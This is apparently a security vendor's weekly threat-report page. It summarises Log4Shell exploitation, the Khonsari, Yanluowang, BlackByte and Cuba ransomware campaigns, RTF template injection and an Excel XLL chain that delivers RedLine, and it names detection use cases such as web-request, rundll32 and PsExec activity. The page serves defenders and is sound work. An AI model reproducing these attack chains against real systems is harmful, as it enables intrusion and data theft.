Cloudflare identified and mitigated a distributed denial-of-service attack amassing a record 26 million requests per second (rps).
The Anvilogic Threat Reports
Here you can find an accumulation of trending threats published weekly by our Anvilogic team, The Anvilogic Forge.
We are committed to (read more…)
Here you can find an accumulation of trending threats published weekly by our Anvilogic team, The Anvilogic Forge. We are committed to helping the community detect attacks by helping your team look for malicious exploit strings, as well as, run exposure checks on your endpoint devices/servers, which can help identify a successful payload delivery and compromise using this vulnerability.
- Tactical: Detectable threat behaviors for response with threat scenarios or threat identifiers
- Strategic: General information security news, for awareness
About the Team
The Anvilogic Forge is a team of security professionals dedicated to tracking threats and crafting reliable detection strategies for our trusted clients while contributing to our peers in the security industry.
Our mission is to assess the operational behaviors of all threats to provide the community, and our customers, with actionable information and enterprise-ready detections in order to defend themselves in an ever-changing threat landscape.
Curate threat intelligence to provide situational awareness and actionable intelligence to our clients. The results of our crafts are:
- Threat Identifiers: atomic detections that serve as the foundation of our detection framework.
- Threat Scenarios: risk, pattern, and sequence-based detections utilizing the outputs of Threat Identifiers as a means of identifying actual threats.
- Reports Hot off the forge:
- Threat News Reports
- Trending Threat Reports
- Research Articles
If this information is useful, please feel free to get in touch with us to see how Anvilogic can help you grow your security operations at firstname.lastname@example.org.
Sign-up for Anvilogic’s weekly threat reports and receive a threat round-up, active notifications of relevant threats to harden your security posture, and ready-to-deploy threat detection logic & content associated with applicable trending threats.
If you are not a customer but would like to get the detection code for a specific vulnerability or exploit, reach out to us we’re happy to help: email@example.com
Learn More about The Anvilogic Threat Detection and Incident Response (TDIR) Platform
Microsoft’s tracking of Blackcat/ALPHV ransomware gang has identified an adaptable group of operators utilizing various tactics, techniques, and procedures (TTPs) in their campaigns.
Khonsari Ransomware & Log4Shell
Industry: N/A | Level: Tactical | Source: CadoSecurity
Ransomware family – Khonsari has been observed utilizing CVE-2021-44228/Log4Shell vulnerability targeting Windows servers. The malware executable “groenhuyzen.exe” is dropped and exploits the JNDI class. The malware’s functionality is straightforward at only 12 KB, it’ll enumerate and encrypt (with extension – .khonsari) all mounted drives with the exception of C:\. Only user directories are encrypted including Documents, Videos, Pictures, Downloads, and Desktop.
- Anvilogic Use Case: Potential CVE-2021-44228 – Log4Shell
CVE-2021-44228 / Log4Shell Vulnerability
A zero-day exploit has been identified for Java logging library “log4j” that could result in remote code execution. Affected versions include Log4j 2.0-beta9 up to 2.14.1 with service impacts to many Apache Struts configurations and cloud services such as Steam, Apple iCloud, and others.
The exploit requires three components a vulnerable log4j version, any protocol that enables the attack to send the exploit string, and a log statement that can log the string from the request.
Mitigation is available through an update with affected users recommended to update to log4j version “log4j-2.15.0-rc2”. Threat researchers have identified a variety of threats Kinsing (cryptocurrency miner), Mirai Malware, Cobalt Strike, a new unidentified ransomware strain, and likely others, yet to be identified, taking advantage of the widespread vulnerability.
Magecart Abuses Google Tag Manager
Industry: eCommerce | Level: Strategic | Source: GeminiAdvisory
ANSSI Alerts of Nobelium Targeting French Organizations
Industry: Diplomatic | Level: Strategic | Source: ANSSI
French national cyber-security agency, ANSSI, raised an alert detailing Nobelium phishing campaigns directed at French entities. The campaign observation began in February 2021 with noticed escalation in May. The French email accounts are compromised and then used to send weaponized emails to foreign institutions in the diplomatic sector. The threat group is utilizing various hosting methods, mainly OVH SAS, Hydra Communications Ltd, M247 Ltd and 12 additional observed hosting providers.
NSO Spyware Compromises US State Department Employees’ Phones
Industry: Government | Level: Strategic | Source: Reuters
Apple Inc. has informed at least nine, US Department of State employees, their iPhones had been compromised due to NSO Pegasus spyware. Impacted officials were all either based in Uganda or focused on matters concerning the East African country, as shared by two Reuters sources. The compromises occurred within the last several months.
RTF Template Injection
Industry: Energy (Deepwater) & Government | Level: Tactical | Source: ProofPoint
Proofpoint has observed increased usage of RTF template injections from threat actors TA423, DoNot Team, and Gamaredon since as early as February 2021 with files publicly identified on April 5th. The template injections enables the threat actor to alter the RTF file’s control word structure to substitute a legitimate file destination with a URL that could download a malicious payload. Detection rates for this technique have so far been low. The APT groups have been targeting various organizations and countries with this technique. APT group DoNot Team and TA423 are both associated with targeting Malaysia’s Deepwater energy exploration, while APT actor, Gamaredon, targeted the Ukrainian government.
- Anvilogic Use Cases:
- Malicious Document Execution
- Abuse EQNEDT32.EXE CVE-2017-11882
Microsoft Excel (XLL) Leads to RedLine Info-Stealer
Industry: N/A | Level: Tactical | Source: BleepingComputer
Threat Actors are utilizing public discussion forums, or article comment systems, to spread malicious Excel documents that ultimately download and install RedLine information stealer. Malicious links are hosted on Google Drive and download a XLL which BleepingComputer describes as, “an an add-in that allows developers to extend the functionality of Excel by reading and writing data, importing data from other sources, or creating custom functions to perform various tasks. XLL files are simply a DLL file that includes an ‘xlAutoOpen’ function executed by Microsoft Excel when the add-in is opened.” While tests have had unsuccessful executions, potentially due to incompatible versions of Microsoft Excel, the sequence appears to involve the DLL being executed with regsvr32 or rundll32 that extracts the wget.exe program to download the RedLine binary saving it as %UserProfile%\JavaBridge32.
- Anvilogic Scenario: Malicious Document Delivering Malware
- Anvilogic Use Cases:
- regsvr32 Execution
- Rundll32 Command Line
- Invoke-WebRequest Command
Yanluowang Ransomware Linked to Thieflock Affiliate
Industry: Consultancy, Engineering, Financial & Manufacturing | Level: Tactical | Source: Symantec
Yanluowang ransomware group, active since at least August 2021, have been targeting US Corporations, specifically in the financial, manufacturing, IT, consultancy, and engineering sectors. The group has been utilizing TTPs similar to Theiflock ransomware attacks. Based on observations by Symantec, it seems there is a link, or a shifting of allegiances from Thieflock to the Yanluowang ransomware family. Notable noticed TTP patterns have been the usage of BazarLoader for initial access, PowerShell to download tools enabling RDP in the registry, Adfind for reconnaissance, and the usage of other various credential-stealing tools.
BlackByte Ransomware from RedCanary
Industry: N/A | Level: Tactical | Source: RedCanary
RedCanary presented research from a BlackByte ransomware incident response engagement with Kroll. The attack sequence covered initial access from ProxyShell and web shell through post-exploitation with cobalt strike, impairing defenses with process monitoring, windows defender, and firewall modifications to ransomware and file exfiltration.
- Anvilogic Scenario: BlackByte Behaviors
Industry: Critical Infrastructure | Level: Tactical | Source: FBI
The FBI released a flash report for Cuba ransomware based on tracking since November 2021, has compromised 49 entities across various critical infrastructure sectors, including but not limited to, financial, government, healthcare, manufacturing, and information technology. Hancitor malware is identified as the initial infection vector that leads to the Cuba ransomware. Threat actors utilize phishing emails, Microsoft Exchange vulnerabilities, compromised credentials, and RDP tools to gain initial access. Many legitimate Windows services are employed by the threat actors as well such as PowerShell, PsExec, in addition to leveraging Windows Admin privileges to execute their ransomware.
- Anvilogic Scenario: Hancitor & Cuba Ransomware
- Anvilogic Use Cases:
- Executable Process from Suspicious Folder
- PSexec Service Creation
- Remote Admin Tools